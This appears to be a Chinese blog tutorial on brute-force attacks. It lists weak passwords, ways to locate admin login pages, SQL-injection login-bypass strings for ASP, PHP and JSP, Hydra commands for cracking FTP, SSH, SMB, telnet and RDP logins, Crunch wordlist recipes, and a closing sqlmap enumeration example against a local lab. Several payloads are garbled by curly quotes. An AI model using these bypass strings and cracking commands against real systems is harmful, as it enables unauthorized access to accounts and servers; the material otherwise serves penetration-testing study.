暴力破解

暴力破解简介

暴力破解或称为穷举法,是一种针对账号、密码的破译方法,即将账户、密码进行逐个推算直到找出真正的密码为止。
暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。
暴力破解的危害
恶意用户登录
服务器沦陷
敏感信息泄露
用户密码被重置
敏感目录、参数被枚举
用户订单被枚举

暴力破解的分类
从不同的架构来讲主要分为两种
- 基于B/S架构的暴力破解
登录框(用户名和密码)
URL参数(用户id值、目录名、参数名等)
验证码(验证码接收处)
- 基于C/S架构的暴力破解:
Windows远程桌面
ssh远程桌面
数据库账号密码(mysql mssql Oracle等)
ftp账号密码

B/S架构暴力破解流程

在这里插入图片描述
弱口令
弱口令没有严格的定义和标准,实际上来讲,只要是容易被被人猜测或被工具暴力破解到的口令,均为弱口令。

弱口令指的是仅包含简单数字和字母的口令,例如123、“abc”等。不推荐用户使用。
TOP10:
01:123456
02:12345
03: 123456789
04: Password
05: iloveyou
06: Princess
07: rockyou
08: 1234567
09: 12345678
10: abc123
如果想要进行爆破,我们需要先找到站点的后台地址:
在这里插入图片描述
在网站根目录下
例如:admin.php, manage.php等文件,后台管理地址直接存放在根目录

在非根目录下
最常见,例如:/admin,/manage,还有织梦系统地默认后台地址/dede

旁站
将网站和后台分离开,使用不同的端口,比如:www.cao.com:1433/admin

使用二级域名
普通小网站不讲究,对于大型网站来说,分离主要为了方便管理,例如后台:admin.cao.com

其他服务器
无处可寻的后台,完全与网站分离开,ip 地址不同,域名也不同
找后台的方法
在这里插入图片描述
万能密码
所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。
ASP:
"or “a”="a
')or(‘a’=‘a
or 1=1–
‘or 1=1–
a’or’ 1=1–
"or 1=1–
‘or’a’=‘a
“or”="a’=‘a
‘or’’=’
‘or’=‘or’
1 or ‘1’=‘1’=1
1 or ‘1’=‘1’ or 1=1
'OR 1=1%00
"or 1=1%00
‘xor
PHP
‘or 1=1/*
admin’/*
密码*/’
admin’or 1=1#
JSP
1‘or ‘1’='1

C/S架构暴力破解

爆破神器:Hydra,全能暴力破解工具,功能强大,几乎支持所有协议,由黑客组织thc开发。
hydra常用方法
hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的。

破解FTP
hydra ip ftp -l username -P 密码字典 -t 线程(默认为16)-vV
破解SSH
hydra -l username -P 密码字典 -e ns ip ssh
破解smb
hydra -l administrator -P 密码字典 ip smb
破解telnet
hydra ip telnet -l username -P 密码字典 -t 32 -s 23 -e ns -f -V
破解rdp
hydra ip rdp -l administrator -P 密码字典 -V
C/S架构暴力破解流程:
1、确定攻击目标,需要账号密码输入的地方(常见的远程桌面。ssh.mysql/mssql等)
2、建立socket通信(多线程)
3、输入账号(一般为默认账号)
4、通过字典或规则生成待检测的密码
5、发送密码,取得验证反馈
6、拒绝密码,重复第四步起,如果密码通过,程序停止,显示密码。
字典生成
windoes 下的字典生成工具,易优,品轩等等
Linux下的字典生成工具
crunch cewl cupp
crunch的使用
Crunch是一种创建密码字典工具,按照指定的规则生成密码字典,可以灵活的制定自己的字典文件。使用Crunch工具生成的密码可以输出到屏幕,保存到文件、或另一个程序。由其在渗透测试需要爆破的时候,字典的编排等直接影响到我们的爆破速度,对整个渗透测试流程起着十分重要的作用。
在这里插入图片描述
Crunch常用语句
指定1-3位数的数字组合
crunch1-3位数的数字组合

crunch 1 3 123 // 1代表最小的字符串长度 3代表最大的字符串长度 123为使用自己指定的字符

如果需要包含空格就需要使用双引号对我们的指定字符串
crunch 1 3 “123” // 其中双引号后123后面是有空格的

生成几个元素的组合,适用于社工时候收集的信息
crunch 4 4 -p xifa 2019 0x00 … //最小和最大字符串随机设定,-p 后面设定要组合的元素,用空格分开

生成指定的字符串
生成六位密码,其中前四位为pass,后二位为特殊字符
crunch 6 6 -t pass^^>>newpwd.txt

制作6位数字字典
crunch 6 6 123456789 -o num6.dic

制作139开头的手机密码字典
crunch 11 11 +0123456789 -t 139%%%%%%%% -b 20mib -o START

生成pass01-pass99所有数字组合
crunch 6 6 -t pass%% >>newpwd.txt

生成六位小写字母密码,其中前四位为pass
crunch 6 6 -t pass@@ >>newpwd.txt

生成六位密码,其中前四位为pass,后二位为大写
crunch 6 6 -t pass, >>newpwd.txt

生成六位密码,其中前四位为pass,后二位为特殊字符
crunch 6 6 -t pass^^ >>newpwd.txt

  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
引用中提到,与暴力破解表名类似,暴力跑的列名可以在txt/common-columns.txt中找到。这个文件包含了一些常见的列名。而引用和引用提到了sqlmap的两个命令,分别是使用--current-db来获取当前数据库的名称,使用--dbs来获取所有的数据库名称。综合这些信息,可以使用sqlmap来进行暴力破解。 使用sqlmap的暴力破解功能,可以帮助我们获取目标数据库的信息。首先,我们需要使用sqlmap的-u参数指定目标链接,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1"。然后,使用--current-db命令获取当前数据库的名称,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db。最后,使用--dbs命令获取所有的数据库名称,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs。 通过以上步骤,我们可以使用sqlmap来进行暴力破解,获取目标数据库的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [sqlmap用户手册(七)——爆破等](https://blog.csdn.net/zhaolina004/article/details/14616263)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [实训实训实训](https://blog.csdn.net/IWANnaaa/article/details/123937562)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值